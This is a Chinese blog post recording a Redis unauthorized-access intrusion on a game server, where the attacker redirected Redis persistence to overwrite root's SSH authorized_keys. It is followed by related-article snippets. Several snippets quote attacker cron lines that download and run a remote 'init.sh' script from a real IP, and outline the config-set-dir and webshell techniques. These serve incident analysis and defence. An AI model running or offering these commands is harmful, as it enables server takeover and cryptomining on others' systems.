Redis未授权访问事故记录

原创 已于 2023-06-16 18:16:17 修改 · 832 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#redis #数据库 #缓存

于 2016-04-05 20:10:05 首次发布
文章详细记录了一次游戏服务器Redis数据丢失的问题排查过程,并最终发现是由于Redis配置错误导致背景保存进程异常,进而导致数据丢失,同时揭示了入侵者通过修改Redis配置文件进行攻击的行为。通过分析日志和历史备份文件,确认问题始于4月1日,并成功定位问题原因及入侵手段,最终修复并恢复正常服务。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

很久之前还分享了一篇Redis 未授权访问配合 SSH key 文件利用分析给运维同事,不想今天居然遇上了,特此记录。

发现问题:公司游戏的韩国版本今天停服更新之后,公会信息都丢失了,一开始以为是公会数量太多,特定数量的下发包也超过了网络层的包大小限制。

跟踪问题:

1.到现网机器上看redis数据,居然查不到公会数据,不过发现redis居然还是绑定的*,不是内网ip(不过介于运维同事说是这一块做了防火墙设置就没有细究)

2.查看gamesvr发现一堆“MISCONF Redis is configured to save RDB snapshots, but is currently not able to persist on disk. Commands that may modify the data set are disabled. Please check Redis logs for details about the error.”,直接查看redis源码,产生这个问题的原因就是background save进程没有正常终止

3.这个问题细分情况:

1)无法fork快照进程

2)磁盘已满,快照进程无法完成写操作

3)快照进程被终止,比如kill

4.查看每一小时的rdb备份文件,发现几天内备份的rdb文件都是4月1日的最后更新时间,推断此问题应该是从4月1号开始就是存在的,扫描日志果然如此,由于小平台的redis报警被屏蔽了,问题存在了几天才被偶然发现

5.redis命令行config get *,查看发现dir变成了‘/root/.ssh’, dbfilename变成了'authorized_keys',还是下一身冷汗,这是被入侵了

解决问题:

1.凑巧的是运维同事在4月1号下午的时候统一更换了ssh key,而后面这位不速之客也没有再重新生成ssh key,应该是以为肉鸡已经捕获

2.修改redis配置,将dir和dbfilename指向真正的数据文件,停服重启gamesvr,公会数据加载正常

3.分析日志生成补偿指令,修正玩家数据

Redis未授权访问漏洞记录(端口:6379、Linux、Windows)
墨痕诉清风的博客
11-12 7507
这就让黑客有了可乘之机,黑客可以远程连接到该数据库。但随着现代的服务部署方式的不断发展,组件化成了不可逃避的大趋势,docker就是这股风潮下的产物之一,而在这种部署模式下,一个单一的容器中不会有除 redis以外的任何服务存在,包括sh和 crontab,再加上权限的严格控制,只靠写文件就很难再 getshell了,在这种情况下,我们就需要其他的利用手段了。并且可以在 /root/.ssh/ 目录下看到我们上传的 authorized_keys 文件,正是由于这个文件的存在,我们才可以在本地用私钥登录。.
redis未授权访问漏洞利用+redis日志分析
ChenD的学习笔记
05-22 1827
下载: wget http://download.redis.io/releases/redis-2.8.17.tar.gz。将redis-server复制到/usr/bin目录下:cp redis-server /usr/bin/将只允许本地连接注释掉,保护模式关掉,然后保存一下,再启动redis服务,再使用kali连接一下。将redis-cli复制到/usr/bin目录下:cp redis-cli /usr/bin/将redis-server 移动到/usr/bin/
记录一次被攻击勒索(redis未授权访问”漏洞)
腾飞日记
12-09 2168
背景话说,我开了一台腾讯云服务器跑redis-server,并将其配置为无须密码对外开放,方便我本地调试代码。 今天下午却意外发现云主机被关机了,上午我还用来调试代码呢,重新开机并登陆查看系统日志发现有个俄罗斯的IP地址登陆了系统并关闭了我的redis-server且关机。
redis未授权访问反弹shell
18年3月萌新白帽子
06-26 4620
一、redis的安装1.使用wget命令获取redis的安装包wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.tar –zxvf redis-4.0.8.tar.gz解压改文件然后进入redis-4.0.8这个文件夹   cd redis-4.0.8然后执行make命令由于我们刚刚安装好redis数据库,还未创建用户,默认使用的...
redis未授权访问getshell的方式
居上
06-28 2146
redis简介 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库 端口:6379 环境 kali =>192.168.60.134 cenos => 192.168.60.130 redis未授权访问 Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上 ./redis-server 使用默认配置 ./red
Redis未授权访问攻击场景分析与防御
si1ence的博客
07-18 922
主要从redis未授权访问入手,还原一些黑客的攻击场景,介绍一些常用的攻击方法和安全知识。 0x0 应用介绍 REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语...
关于Redis未授权访问漏洞利用的介绍与修复建议
09-09
然而,Redis的一个常见安全问题在于其默认配置可能导致未授权访问漏洞,这允许任何能够访问服务器的用户无需认证即可读取或篡改Redis数据。 **一、漏洞介绍** 默认情况下,Redis绑定在0.0.0.0:6379,这意味着它...
redis未授权访问(二)
scu_hacker博客
09-22 1340
本文针对常见redis未授权漏洞在windows下的利用展开说明
Redis 未授权访问 写入webshell记录
qq_38053759的博客
04-08 1113
Redis 未授权访问 写入webshell记录 准备环境: win10(192.168.39.52): 小皮面板(redis) kali(192.168.39.191):redis 1.Redis安装 win10:安装小皮面板,利用小皮面板安装redis。软件管理》工具,点击安装即可。 点击redis设置,系统默认绑定IP为:127.0.0.1,改为0.0.0.0(默认绑定本地的话远程无法访问redis,故设置为0.0.0.0,即所有IP均可访问) 配置完成到首页启动redis即可.
Redis未授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1452
redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。
Redis未授权漏洞利用
小安安
12-02 1364
Redis未授权漏洞利用
cleanfda攻击防范
IT从业者
04-15 2145
1.检测crontab任务列表 crontab -l 如果任务列表中出现任务你不清楚的定时任务,请马上去检测该定时任务是干什么的。 2.查看是否存在异常进程 通过top命令查看那些占用CPU高的异常进程,这种进程一般都是攻击者使用,注意如果前面没有清理掉异常的定时任务,在这里杀点异常进程,过一段时间定时任务一会再次执行的。 3.查找cleanfda挖矿攻击的核心文件 如何出现下面的情况,表示你的主机已经中招了,请第一时间清理异常定时任务和异常进程。 ...
记录第一次云服务器redis被黑
m0_73520938的博客
04-24 796
redis里莫名奇妙被写入四个键值对,backup1,backup2,backup3,backup4,内容是奇奇怪怪的sh脚本:*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh。施展百度大法后发现原来被挖矿了.....(redis明明设置了密码.....)解决办法:设置更复杂的redis连接密码,安全组,防火墙。
拯救redis被攻击后的服务器
CheerTan is here
02-05 3236
现象描述 最直观的就是服务器CPU居高不下,服务器里的nginx服务不断被关停,redis6379端口不断被各种服务器连接,而且每5s中就切换一次连接任务,后来查看定时任务里赫然出现一个定时脚本,每30分钟便执行一次,定时任务无法修改,病毒文件无法删除,详情见下图: 原因分析 根本原因在于开启了redis并选用了默认端口并用root权限启动,最致命的就是没有设密码暴露在公网,当时为了调试只开放了5小时左右,服务器就已中招。 病毒脚本分析 #!/bin/sh #暂时关闭SELINUX,以方便后续永久关
Redis未授权漏洞蜜罐模拟与捕获分析
二狗的博客
02-10 800
文章主要分析Redis未授权漏洞的原理及形成原因,使用vulhub靶场进行漏洞复现,在了解漏洞原理并复现的基础上使用golang编写蜜罐代码进行模拟,开放端口在网上捕获真实存在的恶意攻击行为,对恶意样本进行分析,总结出威胁情报。蜜罐程序使⽤golang语言编写,本次编写蜜罐程序为低交互蜜罐,低交互蜜罐模拟网络服务响应和攻击者交互,容易部署和控制攻击,但是模拟能力相对较弱,对攻击的捕获能力不强。
Redis未授权访问
npc88888的博客
05-09 2968
在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实 现一个新的Redis命令,通过c语言编译并加载恶意.so文件,达到代码执行的目的。更改目标服务器Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):config set dir /root/.ssh。原文链接:https://blog.youkuaiyun.com/weixin_45605352/article/details/118790775。进入/root/.ssh目录: 将生成的公钥保存到。
阿里云ECS-Centos7.9集群部署Redis服务遭木马攻击
lilyliu2535的博客
12-23 3135
阿里云ECS-Centos7.9集群部署Redis服务遭木马攻击 #背景 阿里云ECS-Centos7.9集群:hadoop202,hadoop203,hadoop204 hadoop202启动redis-server服务 redis.conf配置 #bind 127.0.0.1 protected-mode no #requirepass hadoop202,hadoop203,hadoop204配置了免密 #遭木马入侵,3台机器 CPU占用高 ~/.ssh/authorized_keys遭篡改 cron
Redis —— 一次错误记录
weixin_51123079的博客
11-27 2101
今天在使用 Redis 存储数据时,发现数据每隔一段时间就会消失,刚开始以为是数据过期时间的问题,使用 QuickRedis 连上 Redis 后,发现数据的过期时间也没有问题,但却发现 数据库0 莫名其妙多出几个 key(backup1、backup2、backup3、backup4),接着我去查看了 Redis 的运行日志,发现 Redis 一直报这个错。,在网上搜索了一番之后,最终确定 Redis 可能遭受了 RDB 方式的入侵攻击。
Redis 也能被攻击?一次Redis被入侵的记录
探索云原生
12-05 5822
通过 RDB 方式入侵,Redis 被攻击记录 1. 详情 发现 Redis 中突然多了几个 key backup1 backup2 backup3 backup4 具体内容如下: */2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 *
redis未授权访问漏洞
最新发布
01-10
### Redis 未授权访问漏洞解决方案与预防方法 #### 检测 Redis 未授权访问漏洞 为了有效检测 Redis 实例是否存在未授权访问漏洞,可以采取以下措施: - **网络扫描工具**:使用 Nmap 或其他类似的网络安全扫描工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值